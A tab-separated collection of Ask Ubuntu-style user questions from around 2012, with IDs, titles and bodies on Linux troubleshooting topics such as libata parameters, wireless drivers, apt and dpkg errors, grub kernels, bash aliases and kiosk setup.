145965	how do i target a specific driver for libata kernel parameter modding ?	i 'm running a 22-disk setup , 19 of those in a zfs array , 15 of those backed by three port multipliers attached to sata controllers driven by the sata_sil24 module . when running full speed ( sata2 , 3 gbps ) , the operation is pretty quirky . simple read errors will throw an entire port multiplier into spasms for a long time , sometimes with pretty awful results . booting with kernel parameter libata.force=1.5g to force sata controllers into `` legacy '' speeds completely fixes all issues with the port multipliers . thing is , my zfs pool is backed by a fast cache ssd on my ich10r controller . another ssd on this same controller holds the system . doing libata.force=1.5g immediately shaves about 100 mb/s off the transfer rate of my ssds . for the root drive , that 's not such a big deal , but for the zfs cache ssd , it is . it effectively makes the entire zpool slower for sustained transfers than it would 've been without the cache drive . random access and fs tree lookups , of course still benefit . listing the module options for sata_sil24 , no such option exists . how to pass the libata.force=1.5g parameter on to just the three sata controllers being backed by the sata_sil24 module ?
145976	how do i download all the proprietary drivers for offline use ?	in what repository do the proprietary drivers that are found on the additional drivers window found and how can i copy them all so i can have them stored in case i find myself in a computer with a proprietary need but no internet access .
145977	unable to install ubuntu on hcl laptop ?	i have been trying to install ubuntu on my hcl lpatop that has got the following properties intel ( r ) core ( tm ) 2 duo cpu t5250 @ 1.50ghz 233mhz , 0.99 gb of ram i have tried ubuntu 12 and ubuntu 10 with dual booting microsoft windows xp professional version 2002 service pack 2 but whenever i try to install , it boots from the city and shows the ubuntu logo . it keeps showing the ubuntu logo for a long time and then my laptop gets freeze , it shows blank screen.. i have tried this for several times with different versions but the result is same .
145978	strange thing happening in command prompt	i 'm using ubuntu in command line mode , no gui . i 'm new to unix , so i 'm a bit confused by something that just happened . i accidentally typed `` suspend '' instead of `` pm-suspend '' , and my root~ # : prompt disappeared . now , whatever i try to enter just gives me a line break , and pressing keys like esc , gives me ^ [ , the arrow keys are all something along the lines of ^ [ ^ [ [ d. what can i do to return to the normal shell prompt ?
145980	how to add the software which i have made to ubuntu 's servers	how do i add my software to ubuntu 's server so that it is available to others to install and use it
145982	limbo does n't detect my shader model 3.0	i recently bought the humble indie bundle v and installed limbo with the ubuntu software center . when i launch it , it says it does n't detect shader model 3.0 . i read about wine having issues detect shader model 3.0 and that running limbo in an older version might help . but i 'm still not sure . is there another fix for it ? my gpu is a ati mobility radeon 9600 .
145989	why ca n't i connect to the internet ?	when i try to connect to my network with wireless , the network i want to connect to is grayed out . wired works fine . the network is wpa2 , and i am using ubuntu 12.04 on an ibm thinkpad t30 with an intel pentium 4m processor . wireless works fine with windows 7 ( it 's a dual-boot ) . i have only 512 mb ram . any suggestions can and will help !
145990	desktop wo n't display correctly	i recently installed 12.04 lts . however , the the graphical desktop is `` broken '' ( it seems that the screen drawing is failing , fading and flashing each of the `` triangles '' created on the screen ) . i tried uninstalling and reinstalling the system several times and this did not work . is there something that can fix this ? untranslated original : ola pessoal , sou uruario linux a 1 ano , recentemente instalei no pc o linux ubuntu 12.04 lts precise pangolin mas ele fica com a interface grafica `` quebrada '' ( parece que a tela foi dividida de ponta a ponta e fica falhando , sumindo e piscando em cada um dos `` triangulos '' criados na tela ) eu gostaria de saber como posso resolver este problema , pois ja tentei desintalar e reinstalar o sistema varias vezes e nao funcionou ( ja ate baixar a versao de outros sites mas deu na mesma ) existe algo a ser feito ou devo usar o windows mesmo ?
145991	i want to change the text dat `` lampp '' in opt/lampp ( i installed xampp ) , but i ca n't	i tried to change the rights of the folder `` lampp '' , heres a screenshot : i also pressed `` zugriffsrechte auf enthaltene datein 端bertragen '' ( apply permissions to enclosed files ) . what did i do wrong ? sorry for my bad english , i 'm german ; - )
145992	ubuntu does n't recognise my wireless adapter	i have installed ubuntu on my acer laptop , but i can '' t access the internet . as far as i can tell it is because my wireless adapter ( built-in broadcom 802.11g ) is not recognised . i have windows 7 also on the laptop and it does recognise the wireless , so i can only assume it is something o do with ubuntu . i suppose it might need a driver . i have read that i could try to connect my laptop via a cable to the router , but sadly i do not have a cable , nor do i have any access to one or to any shop that might sell it , so i hope there is some other solution , maybe by downloading via the windows setup . if anyone can provide any guidance or advice i would appreciate it . i am completely new to ubuntu , so please bear this in mind .
145994	svg version of ubuntu one files/music apps for ios	is there an svg version of the icon for either the ubuntu one files or music app for ios ? the code on launchpad only has png version .
146005	print to an ubuntu printer that is not supported by windows 7	i have an hp laserjet 1000 that is working fine in ubuntu 12.04 and is shared but there is no driver for windows 7 . is it possible to create a wrapper for it , maybe with something like ghostscript to present it as a different printer when shared so i can user it remotely ?
146008	i killed a frozen ubuntu desktop using `` killall gdm '' then after it takes me to a terminal ?	so i am running a theme on gnome and it froze , so i used killall gdm to kill it , after this it took me to a fullscreen terminal which i can not get out of . it tells me to login , which i do . and then it says : last login sun jun 3 11:19:32 pdt 2012 on tty4 welcome to ubuntu 12.04 lts ( gnu/linux 3.2.0-24-generic x86_64 ) * documentation : https : //help.ubuntu.com/ 22 packages can be updated . 0 updates are security updates . casey @ casey-computer : ~ $ i want to just get back to my desktop and start using my computer again , what should i do , what code should i type ? i am a noob with ubuntu , so any code i will probably have to copy .
146012	are configurations still needed for ssd drives in 12.04+	i will be getting an ssd drive soon but since 12.04 received many many changed in regards to everything , i was wondering if there is still a need to do several configuration changes to several files , for example , editing the fstab file to enhance the sdd performance and other changes . is this still needed to make an sdd drive performance better ? what changes are already incorporated into 12.04 that will make ssd drives performance better by default . what changes are still needed to modify ?
146013	reinstall commercial software ( e.g . oil rush , steelstorm etc . )	after a reinstall of ubuntu 12.04 , it 's impossible to install commercial games , e.g oil rush . it gives this error : failed to fetch https : //private-ppa.launchpad.net/commercial-ppa-uploaders/oilrush/ubuntu/dists/oneiric/main/binary-amd64/packages the requested url returned error : 401 failed to fetch https : //private-ppa.launchpad.net/commercial-ppa-uploaders/oilrush/ubuntu/dists/oneiric/main/binary-i386/packages the requested url returned error : 401 some index files failed to download . they have been ignored , or old ones used instead . i bought these games in 11.10 , but i installed these games in 12.04 before ... how can i solve this problem ?
146015	macos-style opening files via console with their default applications	is there are way to use the macos command open to open files with their default applications like e.g . open mytext.pdf or open myprogramm.java . can ubuntu be extended in this way ?
146017	mountall fails on startup	after ubuntu boots , the tty1 ctrl+alt+f1 shows this : thegatorade-pc login : mountall : disconnected from plymouth mountall : event failed this happened after partitioning with gparted and happens every time i use ubuntu .
146018	how to add third-party app to unity launcher and dash ?	i 've just downloaded an executable file from the internet ( an app ) and would like to dock it in the unity sidebar , but i ca n't just drag it over . in other apps i installed ( aside from the ubuntu software centre ) , their installer asked to register the app with the system , thus allowing me to properly use them with unity and dock them . how can i manually register my app with the system ? i do n't want to just dock the app , i 'd like for it to also show up in searches , just like a normal usc-installed app behaves . i 'm running ubuntu 12.04 lts .
146030	vpn disconnected : resolv.conf not refreshed	i connect to vpn using vpnc . when vpn disconnects , either via time out or the session limit is reached , vpn is terminated , but resolve.conf continues to contain references to my vpn network . resolv.conf before vpn is connected : nameserver 127.0.0.1 search mylocalnetwork resolv.conf after vpn is connected and remains once vpn is lost : nameserver x.x.x.x nameserver x.x.x.z nameserver 127.0.0.1 search internal.mycompany.com mylocalnetwork in 10.04 , when vpn lost , i 'd run this script to refresh resolve.conf : 7 $ cat bin/refreshresolvconf.sh # ! /bin/bash # if [ -e /etc/resolvconf/run/interface/tun0 -a `` `pidof vpnc` '' == `` '' ] ; then /sbin/resolvconf -d tun0 ; fi if [ -e /etc/resolvconf/run/interface/tun0 -a `` `pidof vpnc` '' == `` '' ] then /sbin/resolvconf -d tun0 ; echo `` refreshed resolv.conf '' fi but , resolveconf changed in 12.04 changed , so this script is no longer applicable . to resolve , i manually edit resolve.conf or turn off/on my connection via `` gnome-control-center network '' . anyone else have the same problem ? how can resolv.conf be updated post-vpn disconnect ?
146031	bash alias -= ... ( alias name should be a simple dash ) not working	i want to create an alias for cd - which should be just a dash ( - ) . i tried without success : alias -='cd - ' # bash : alias : -= : invalid option alias \-='cd - ' # bash : alias : -= : invalid option alias '-'='cd - ' # bash : alias : -= : invalid option alias '\-'='cd - ' # bash : alias : `\- ' : invalid alias name . the former three are the same ( only different input , but bash turns all of them into the same command alias with a single argument -=cd - ) , so it 's no surprise the error message is the same . i 'd guess that if the argument starts with a dash , it 's parsed as a flag rather than the alias name . is it even possible to use - as an alias name ?
146032	i put ubuntu live usb to laptop and nothing happened	as the title says..i created it , do n't know if right . it does n't do anything . what should i do ? thanks.. ( i have some grub problems )
146046	vlc as standard for avi files	how can i make vlc player the default player for avi files . so if i double click on an avi file , it will open with vlc instead of the movie player . i 've tried by going to : system settings - details - default applications and select vlc player instead of movie player , for video . is there and other way of accomplishing this ? ubuntu 12:04 lts
146049	how can i jailbreak and restore an iphone 3g on ubuntu ?	i 'm new to ubuntu , and i did n't realize how to make it fully friendly with my iphone 3g . the matter is that i need to restore it to a custom firmware and i ca n't find snowbreeze for ubuntu , or any other tool which let me build my custom firmware . and also , how i would load it into my phone without itunes ? thanks and sorry for the bad english . note : i am using ubuntu 12.04 with kde .
146051	how to hide certain icons from unity app lens	ok , so unity is great and all , but something that annoys me that the various systems settings apps show up in the app lens , i do n't need them there because there 's the system settings menu . is there anyway to remove particular icons from the apps lens while still keeping them installed ?
146054	problem installing ubuntu 12.04	i have a dell inspiron laptop . i tried upgrading to 12.04 , but i could not do it all at once due to limited internet access . i had the previous version of ubuntu already on my laptop . once i closed my laptop during the installation process . i forgot to cancel the installation before doing so . now when i turn on my computer i get a purple screen that says : gnu grub version 1.99-12ubuntu5 followed by a list of ubuntu versions to boot and couple of memory test options . all the tests come out fine . when i try to boot one of the options i get a black screen that says : mountall : /lib/x86_64-linux-gnu/libc.so.6 : version 'glibc_2.14 ' not found ( required by /lib/libply.so.2 ) general error mounting filesystems . a maintenance shell will now be started . control-d will terminate this shell and reboot the system when i try apt-get install to install whats missing i get : w : not using locking for read-only lock file /var/lib/dpkg/lock e : dpkg was interrupted , you must manually run 'dpkg -- configure -a ' to correct problem when i try to run that it says dpkg : error : unable to access dpkg status area : read-only file system . i also made an install disk of 12.04 from my girlfriend computer . i then try to boot it off the cd drive . it opens ubuntu then an error shows up saying that there is a problem with the media i 'm trying to install it from . what can i do ?
146057	re-formating hd	i have made a mess out of the hd in my netbook , i need to re-format the entire drive which has no date except different versions of ubuntu . how can i re-format the drive using flash drives or an external read only cd/dvd reader and what command lines need to be used and what is the procedure in particular to do so please . i 'm not computer literate by the way . thank you .
146069	i 'm running ubuntu 12.04 lts and i am recieving error message when trying to update software . can i fix this ?	i am receiving this message when trying to update : - failed to fetch http : //gb.archive.abuntu.com/ubuntu/pool/main/s/software-center/software-center_5.2.2.1_all.deb 404 not found my internet connection is good and stable but this is preventing my updates from downloading and i would like some information which may help me resolve this problem . thank you . p.s . i 'm new to using linux os : )
146070	how to remove unnecessary packages	i had installed openjdk 7 runtime ( openjdk-7-jre ) and when it was installed , it also accompany with lot of package depends , but when i wanted to remove . it just removed openjdk-7-jre size 800 kb , and not removed all openjdk 7 runtime depends . actually , it become unnecessary packages . how should i do to fix it ?
146074	touchpad too sensitive on samsung series 7	i just installed ubuntu 12.04 on my samsung series 7 np700z5b-s01ub . the touchpad worked out of the box and that has been awesome . but the touch pad 's tap to click is too sensitive . it keeps selecting things as i 'm just trying to move the pointer . i did n't have this problem with windows so this tells me that it can be configured to be less sensitive . need help doing this . ps : i know turning off tap to click is an option but i do n't want that . pps : i see various sensitivity sliders in the config but they seem to be at the lowest and mostly around acceleration of pointer not for tap sensitivity .
146075	problems after install	after windows installer successful , and booting , systems seems to bog down to almost non-responsive when desktop menu items are selected . is there a minimum ram or other system req ?
146076	network is not working anymore - ubuntu 12.04	i have a problem with my network connection . i have been using the same laptop with ubuntu and the same connection for more than a year , and suddenly yesterday the connection stopped working ( both wireless and wired ) . i 've tested with another computer and the connection is fine ( both wireless and wired ) . i 've been reading similar posts but i have n't found a solution yet . i tried a few commands that i 'm posting here ( my system is in spanish , so i have traslated it to english , maybe the terms are not accurate ) : grep -i eth /var/log/syslog | tail jun 3 18:45:40 vanesa-pc networkmanager [ 3584 ] : < info > ( eth0 ) : now managed jun 3 18:45:40 vanesa-pc networkmanager [ 3584 ] : < info > ( eth0 ) : device state change : unmanaged - > unavailable ( reason 'managed ' ) [ 10 20 2 ] jun 3 18:45:40 vanesa-pc networkmanager [ 3584 ] : < info > ( eth0 ) : bringing up device . jun 3 18:45:40 vanesa-pc networkmanager [ 3584 ] : < info > ( eth0 ) : preparing device . jun 3 18:45:40 vanesa-pc kernel : [ 7351.845743 ] forcedeth 0000:00:0a.0 : irq 41 for msi/msi-x jun 3 18:45:40 vanesa-pc kernel : [ 7351.845984 ] forcedeth 0000:00:0a.0 : eth0 : no link during initialization jun 3 18:45:40 vanesa-pc kernel : [ 7351.847103 ] addrconf ( netdev_up ) : eth0 : link is not ready jun 3 18:45:40 vanesa-pc networkmanager [ 3584 ] : < info > ( eth0 ) : deactivating device ( reason 'managed ' ) [ 2 ] jun 3 18:45:40 vanesa-pc networkmanager [ 3584 ] : < info > added default wired connection 'wired connection 1 ' for /sys/devices/pci0000:00/0000:00:0a.0/net/eth0 jun 3 18:45:40 vanesa-pc kernel : [ 7351.848817 ] addrconf ( netdev_up ) : eth0 : link is not ready ifconfig -a eth0 link encap : ethernet addresshw 00:1b:24 : fc : a8 : d1 active broadcast multicast mtu:1500 metric:1 packages rx:0 errors:16 lost:0 overruns:0 frame:16 packages tx:123 errors:0 lost:0 overruns:0 carrier:0 colissions:0 length.tailtx:1000 bytes rx:0 ( 0.0 b ) tx bytes:26335 ( 26.3 kb ) interruption:41 base address : 0x2000 lo link encap : local loop inet address:127.0.0.1 mask:255.0.0.0 inet6 address : : :1/128 scope : host active loop working mtu:16436 metrics:1 packages rx:1550 errors:0 lost:0 overruns:0 frame:0 packages tx:1550 errors:0 lost:0 overruns:0 carrier:0 colissions:0 long.tailtx:0 bytes rx:125312 ( 125.3 kb ) tx bytes:125312 ( 125.3 kb ) iwconfig lo no wireless extensions . eth0 no wireless extensions . sudo lshw -c network *-network description : ethernet interface product : mcp67 ethernet manufacturer : nvidia corporation physical id : a bus information : pci @ 0000:00:0a.0 logical name : eth0 version : a2 series : 00:1b:24 : fc : a8 : d1 capacity : 100mbit/s width : 32 bits clock : 66mhz capacities : pm msi ht bus_master cap_list ethernet physical mii 10bt 10bt-fd 100bt 100bt-fd autonegotiation configuration : autonegotiation=on broadcast=yes driver=forcedeth driverversion=0.64 latency=0 link=no maxlatency=20 mingnt=1 multicast=yes port=mii resources : irq:41 memoria : f6288000-f6288fff ioport:30f8 ( size=8 ) memoria : f6289c00-f6289cff memoria : f6289800-f628980f lsmod module size used by usbhid 41906 0 hid 77367 1 usbhid rfcomm 38139 0 parport_pc 32114 0 ppdev 12849 0 bnep 17830 2 bluetooth 158438 10 rfcomm , bnep binfmt_misc 17292 1 joydev 17393 0 hp_wmi 13652 0 sparse_keymap 13658 1 hp_wmi nouveau 708198 3 ttm 65344 1 nouveau drm_kms_helper 45466 1 nouveau drm 197692 5 nouveau , ttm , drm_kms_helper i2c_algo_bit 13199 1 nouveau psmouse 87213 0 mxm_wmi 12859 1 nouveau serio_raw 13027 0 k8temp 12905 0 i2c_nforce2 12906 0 wmi 18744 2 hp_wmi , mxm_wmi video 19068 1 nouveau mac_hid 13077 0 lp 17455 0 parport 40930 3 parport_pc , ppdev , lp forcedeth 58096 0 let me know if i can give you more information .
146088	gnome shell installed not working in ubuntu 12.04	i had gnome shell working perfectly on my desktop , and i tried to install it on my laptop by the exact same method , ( tried apt-get , synaptic and software centre ) , but it wo n't work . it seems to install fine with no errors . if i select `` gnome '' at login , i get the `` gnome classic '' interface rather than gnome shell . my laptop has sufficient specs to run gnome shell . am i missing something ? edit : i have just discovered that under system > details > graphics , it says `` unknown '' . so , ubuntu has n't recognised my graphics card , and i 'm guessing this is why gnome shell ca n't work . i have a nvidia geforce gt 525m . how can i get it working ? ( as you may have realised , i 'm a linux noob )
146090	key 'del ' work like f12 on lenovo u300s	in the console when i press the del button , i see ~ . if i press del button in browser , opens firebug..
146099	korean symbols written ontop of each oher in chromium	i 've got the really weird korean letters beeing written ontop of eachother , which is really disturbing as you ca n't read them anymore . in the picture you see what it looks and should look like . http : //imgur.com/wmqhn the `` one '' symbol is actually that what you 're able to see in the tooltip ... just installed my ubuntu a few hours ago - hope to get this solved , as it only appears in chromium , but not in the tooltips when hovering over things .
146100	how to preserve icons and emblems when copying files	when i copy a file through nautilus its emblem or icon is preserved , but if i do it with cp or rsync through cli it is n't . why , and how to fix it ? by preserved i mean that icons that i have manually changed stay like that when copying through nautilus , and are otherwise reset to the default icons when copying through cli .
146104	why some user functions do n't get recognised by bash ?	i can define a function like : myfunction ( ) { ls -r `` $ 1 '' ; } and then myfunction . just works . but if i do echo `` myfunction . '' | sh echo `` myfunction . '' | bash the messages are : sh : myfunction : not found bash : line 1 : myfunction : command not found why ? and how can i call a function that comes from a string if not by piping it to sh or bash ? i know there is this command source , but i am confused of when i should use source and when sh or bash . also , i can not pipe through source . to add to confusion , there is this command . that seems to have nothing to do with the `` . '' that means `` current directory '' .
146107	is there a way to alias the command cd so that it protects the arguments ?	when i run cd my folder there is an error because i have not protected the string . bash : cd : my : no such file or directory but this works fine cd `` my folder '' is there a way to redefine cd as an alias or a function so that it automatically protects all the following arguments as one single string ? this approach did not work , as i supposed it would n't : cd ( ) { cd `` $ * '' ; }
146108	how to use https with apt-get ?	does apt-get use https or any kind of encryption ? is there a way to configure it to use it ?
146111	is there any way to completely wipe ubuntu ?	i 've completely screwed up my ubuntu install , and want to start over ( i want to try a different edition anyway , so downloading a new package using apt-get wo n't be necessary ) . is there any way to completely wipe the boot disk using unix commands ? as it happens , in screwing up my ubuntu , i 've gotten rid of the gui , and it freezes when i try to boot into gui-less mode ; recovery mode is my only option .
146125	mkdir in ubuntu does not work	i wrote this command in my editor but no result ( no warehouse directory ) sudo mkdir -p /downloads/hive/warehouse how do i make this work ?
146127	how do i create a bootable usb on ubuntu from hiren 's boot cd iso for windows ?	trying to create a hiren 's bootcd on a usb . not needing anything else such as a dual boot of ubuntu and haren or window 's and haren . all the programs that i can find to complete this either end up directing me on how to create a ubuntu boot on a usb , or how to do it on windows . but since it is my windows computer that i 'm trying to fix i need an alternative . please help ?
146131	intel ivy bridge z77 driver for ubuntu 12.04	i was wondering where i can get the repository for the latest intel z77 chipset from ? i 've got the new intel ivy bridge 3570k along with with the built in hd4000 video card . 12.04 keeps freezing randomly . whether i 'm browsing , encoding a video , or watching youtube . the other thing i noticed in system setting is that the graphic card is n't identified as intel hd4000 , whereas it was in 11.10 . i 'm going to use this pc mainly for htpc , so i need to make sure that all the hardware acceleration is maintained if i have a driver installed . i found https : //launchpad.net/~ubuntu-x-swat/+archive/x-updates but they do n't seen to mention anything about the z77 chipset . thanks for your help .
146136	hauppauge wintv-hvr-2250 tuner firmware to work in 12.04 mythubuntu ?	i have a htpc running 10.10 and am trying to get the firmware . i have tried the downloads from www.kernellabs.com and instructions from http : //linuxtv.org/wiki/index.php/hauppauge_wintv-hvr-2200 for the saa1764 firmware , but i think these may not apply to the 3.2.0-24 kernel .
146137	login screen loops unless you login as guest	i am running a vmware player with a ubuntu 12.04 lts precise pangloin as guest on my windows 7 . sometimes i get the shutdown blue screen error in windows , this time it happened when i was running the player . when i restarted everything ubuntu gave the not so unfamiliar in this forum login loop in adminstrator login . i login and there 's this black screen where i can only read : `` piix4 ... smbus:0.0.0.07.3 host smbus controller not enabled '' . when i go to the prompt in root mode it fails to update and only upgraded , specially some plugins ( i think graphic plugins ) which also appear in one an error message after quitting the prompt , but theyâ´are successfully installed . they are not the error message . after that i have been working with the fail/safe mode recovery panel . when i try to update via root i get errors like this : w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/precise/release.gpg could not resolve 'extras/ubuntu.com there are 8 more like this referring to areas like : -archive/canonical.com -ppa.launchpad.net -security.ubuntu.com -us.archive.ubuntu.com - release.gpg precise-updates/release.gpg precise_backport/release.gpg final message : some index files failed to download ... ..they have been ignored or old files are used . the black screens most of the time pass by too fast for me to pick up any information . but in general i think i have done everything i was able to in the recovery panel including updating network and graphic packages and recovering filesystem packages and the basic stuff ( i am a beginner regarding linux ) in the root prompt . now i am stuck in this screen with graphic options : - run in low-graphics mode just for one session - reconfigure graphics - troubleshoot the error - exit to console login i am trying to choose to reconfigure graphics but the mouse disappears in the virtual machine screen and sometimes when options change ityâ´s only the first and last option . ut this happens from the blue without messages . this particular option menu is in the regular gui style against a black screen in terminal style . really strange . thanx in advance , all is welcome and appreciated .
146139	amd cpu overclocking software ?	is there a program for ubuntu that i can use to overclock my amd phenom ( tm ) ii x2 560 processor ?
146146	how to configure ubuntu for public kiosk use ?	my local library currently uses windows with steadystate to provide a locked-down , `` stateless '' pc . it provides library patrons with access to a web browser , office and a couple of other apps . once a patron logs off or their session times out , steadystate wipes any changes they made to hard drive . i 'd like to do the same with ubuntu : provide access to open/libre office access to chrome or firefox . be able to print to hp printers . erase any changes made by the user after each user session and/or reboot . no access to the command line or any other unauthorized apps . this question provides a few answers but it 's two years old so i 'm wondering if there are newer/better solutions ?
146150	unable to fix broken packages with sudo apt-get install -f	here 's my result , of sudo apt-get install -f. i have ran it twice and got negative result . i believe there is an error at '' error in version string '0:3.6.1-dates for language english translation data updates for all supported packages for : english '' this same statement `` error in version string > > > > , caused me three days of attempting to download version 12.04 . there is a bug report concerning the quoted text as well . is there anyway to download the version without the language packs , why would i corrupt version 11.10 ? also , when attempting to download synaptic using sudo apt-get install synaptic , i get the same error message . again i point out the initial download problems and the same error message receipt . thanks b0b @ b0b-ic780m-a : ~ $ sudo apt-get install -f [ sudo ] password for b0b : reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 298 not upgraded . b0b @ b0b-ic780m-a : ~ $ sudo apt-get install -f reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 298 not upgraded . b0b @ b0b-ic780m-a : ~ $ sudo apt-get upgrade install reading package lists ... done building dependency tree reading state information ... done the following packages have been kept back : linux-headers-generic software-center the following packages will be upgraded : accountsservice acpi-support acpid aisleriot alsa-utils app-install-data-partner appmenu-qt apport apport-gtk apt-transport-https apt-utils aptdaemon aptdaemon-data apturl apturl-common banshee banshee-extension-soundmenu banshee-extension-ubuntuonemusicstore baobab bind9-host binutils bluez-alsa bluez-cups bluez-gstreamer brasero brasero-cdrkit brasero-common checkbox checkbox-gtk command-not-found command-not-found-data compiz compiz-core compiz-gnome compiz-plugins-default compiz-plugins-main-default cups cups-bsd cups-client cups-common cups-ppdc deja-dup desktop-file-utils dnsutils empathy empathy-common eog evince evince-common evolution-data-server evolution-data-server-common file-roller firefox firefox-globalmenu firefox-gnome-support gbrainy gcalctool gconf2 gconf2-common gedit gedit-common ghostscript ghostscript-cups ghostscript-x gir1.2-atspi-2.0 gir1.2-gconf-2.0 gir1.2-gnomebluetooth-1.0 gir1.2-gtk-3.0 gir1.2-gtksource-3.0 gir1.2-totem-1.0 gir1.2-unity-4.0 gir1.2-webkit-3.0 gnome-accessibility-themes gnome-bluetooth gnome-control-center gnome-control-center-data gnome-desktop3-data gnome-font-viewer gnome-games-common gnome-icon-theme gnome-mahjongg gnome-online-accounts gnome-orca gnome-power-manager gnome-screenshot gnome-search-tool gnome-session gnome-session-bin gnome-session-canberra gnome-session-common gnome-settings-daemon gnome-sudoku gnome-system-log gnome-system-monitor gnome-utils-common gnomine gstreamer0.10-gconf gstreamer0.10-plugins-good gstreamer0.10-pulseaudio gvfs gvfs-backends gvfs-bin gvfs-fuse gwibber gwibber-service gwibber-service-facebook gwibber-service-identica gwibber-service-twitter hpijs hplip hplip-cups hplip-data indicator-datetime indicator-session indicator-sound isc-dhcp-client isc-dhcp-common jockey-common jockey-gtk language-selector-common language-selector-gnome libaccountsservice0 libapt-inst1.3 libarchive1 libasound2-plugins libatk-adaptor libbind9-60 libbrasero-media3-1 libcamel-1.2-29 libcanberra-gtk-module libcanberra-gtk0 libcanberra-gtk3-0 libcanberra-gtk3-module libcanberra-pulse libcanberra0 libdecoration0 libdns69 libebackend-1.2-1 libebook1.2-12 libecal1.2-10 libedata-book-1.2-11 libedata-cal-1.2-13 libedataserver1.2-15 libedataserverui-3.0-1 libevince3-3 libgconf2-4 libgnome-bluetooth8 libgnome-control-center1 libgnome-desktop-3-2 libgoa-1.0-0 libgrip0 libgs9 libgs9-common libgtk-3-bin libgtksourceview-3.0-0 libgtksourceview-3.0-common libgweather-3-0 libgweather-common libgwibber-gtk2 libgwibber2 libhpmud0 libimobiledevice2 libisc62 libisccc60 libisccfg62 libjasper1 liblightdm-gobject-1-0 liblwres60 libmetacity-private0 libmission-control-plugins0 libmono-zeroconf1.0-cil libnautilus-extension1 libnm-glib-vpn1 libnm-glib4 libnm-util2 libnotify0.4-cil libnux-1.0-0 libnux-1.0-common libpam-gnome-keyring libreoffice-emailmerge libreoffice-style-human libsane-hpaio libsmbclient libsnmp-base libsnmp15 libsyncdaemon-1.0-1 libt1-5 libtotem0 libubuntuone-1.0-1 libubuntuone1.0-cil libunity-2d-private0 libunity-core-4.0-4 libunity6 libusbmuxd1 libwbclient0 libwebkitgtk-1.0-0 libwebkitgtk-1.0-common libwebkitgtk-3.0-0 libwebkitgtk-3.0-common libxml2 linux-generic linux-image-generic metacity metacity-common mobile-broadband-provider-info modemmanager mousetweaks multiarch-support nautilus nautilus-data nautilus-sendto-empathy network-manager nux-tools onboard openssl pulseaudio pulseaudio-esound-compat pulseaudio-module-bluetooth pulseaudio-module-gconf pulseaudio-module-x11 pulseaudio-utils python-apport python-aptdaemon python-aptdaemon-gtk python-aptdaemon.gtk3widgets python-aptdaemon.gtkwidgets python-brlapi python-cups python-cupshelpers python-gobject-cairo python-httplib2 python-launchpadlib python-libxml2 python-pam python-papyon python-pkg-resources python-problem-report python-pyatspi2 python-software-properties python-ubuntuone-client python-ubuntuone-storageprotocol samba-common samba-common-bin seahorse shotwell simple-scan smbclient sni-qt software-properties-common software-properties-gtk sudo system-config-printer-common system-config-printer-gnome system-config-printer-udev telepathy-indicator telepathy-mission-control-5 thunderbird thunderbird-globalmenu thunderbird-gnome-support tomboy totem totem-common totem-mozilla totem-plugins ttf-opensymbol ubuntu-desktop ubuntu-minimal ubuntu-standard ubuntuone-client ubuntuone-client-gnome ubuntuone-couch unity unity-2d unity-2d-launcher unity-2d-panel unity-2d-places unity-2d-spread unity-common unity-lens-applications unity-services update-manager update-manager-core update-notifier update-notifier-common usbmuxd vim-common vim-tiny vinagre vino xorg xserver-xorg xserver-xorg-input-all xserver-xorg-video-all xserver-xorg-video-intel xserver-xorg-video-openchrome xul-ext-ubufox 296 upgraded , 0 newly installed , 0 to remove and 2 not upgraded . need to get 0 b/159 mb of archives . after this operation , 10.1 mb of additional disk space will be used . do you want to continue [ y/n ] ? y extracting templates from packages : 100 % preconfiguring packages ... dpkg : error : parsing file '/var/lib/dpkg/available ' near line 4131 package 'python-zope.interface ' : error in version string '0:3.6.1-dates for language english translation data updates for all supported packages for : english . language-pack-en-base provides the bulk of translation data and is updated only seldom . this package provides frequent translation updates . ' : version string has embedded spaces e : sub-process /usr/bin/dpkg returned an error code ( 2 ) b0b @ b0b-ic780m-a : ~ $
146152	adding more already installed os 's to burg	can i add more already installed operating systems [ such as blag linux or fedora ] to burg [ after burg is installed ] so they will appear on boot menu ?
146158	why wo n't grub load my newly upgraded kernel ?	i upgrade my kernel when i run update-grub , these are found searching for splash image ... none found , skipping ... found kernel : /boot/vmlinuz-3.4.0-3-generic found kernel : /boot/vmlinuz-3.2.0-24-generic-pae found kernel : /boot/vmlinuz-3.2.0-24-generic found kernel : /boot/vmlinuz-3.0.0-20-generic found grub 2 : /boot/grub/core.img found kernel : /boot/memtest86+.bin updating /boot/grub/menu.lst ... done but when run uname -r , the kernel is 3.0.0-20 . how can i solve that ?
146160	what is the 'ptrace_scope ' workaround for wine programs and are there any risks ?	to run certain windows programs in wine you need to this workaround : echo 0|sudo tee /proc/sys/kernel/yama/ptrace_scope according to the support websites , this is due to a bug in the ubuntu kernel that prevents ptrace and wine playing well together . using the above command you set the ptrace to 0 which according the research i 've done ( do n't ask me which websites , i have seem a lot of them ) , ptrace has to do with the interactions between programs . the 0 setting is more permissive than the 1 . i have to assume that there was a good reason ubuntu wanted the ptrace=1 so this leads me back to the short form of the question . are there any risks involved in setting ptrace=0 . lower security ? problems debugging ? any others that i have n't thought of ? ? ? p.s . for anybody reading this that wonders what the bug causes , the windows programs will fail to open at all , in the system monitor you will see many instances of the program trying to open and then they will eventually all quit and if you run the progam for the terminal you will get an error that tells you that the maximum number of program instances has been reached .
146161	after force-installing a 32-bit deb failed , how can i install the 64-bit version ?	i tried to dpkg -i -- force-architecture google-earth-stable_i386.deb and it failed . but now when i try to install the amd64.deb it fails saying dpkg : error processing google-earth-stable_current_amd64.deb ( -- install ) : google-earth-stable : 6.2.2.6613-r0 ( multi-arch : no ) is not co-installable with google-earth-stable : i386 6.2.2.6613-r0 ( multi-arch : no ) which is currently installed errors were encountered while processing : google-earth-stable_current_amd64.deb somehow it thinks the i386 version is installed . no google-earth files or directories even exist . sudo dpkg -- configure -a outputs : dpkg : dependency problems prevent configuration of google-earth-stable : i386 : google-earth-stable : i386 depends on lsb-core ( > = 3.2 ) . dpkg : error processing google-earth-stable : i386 ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : google-earth-stable : i386 so it does exist in some capacity . sudo apt-get -f install does nothing out of the ordinary : reading package lists ... done building dependency tree reading state information ... done 0 upgraded , 0 newly installed , 0 to remove and 10 not upgraded . the weird thing is that synaptic does n't show any google earth package available let alone installed , nothing under the broken filter either . i have also tried sudo apt-get autoremove and sudo apt-get autoclean so , my question : how can i get rid of this issue ?
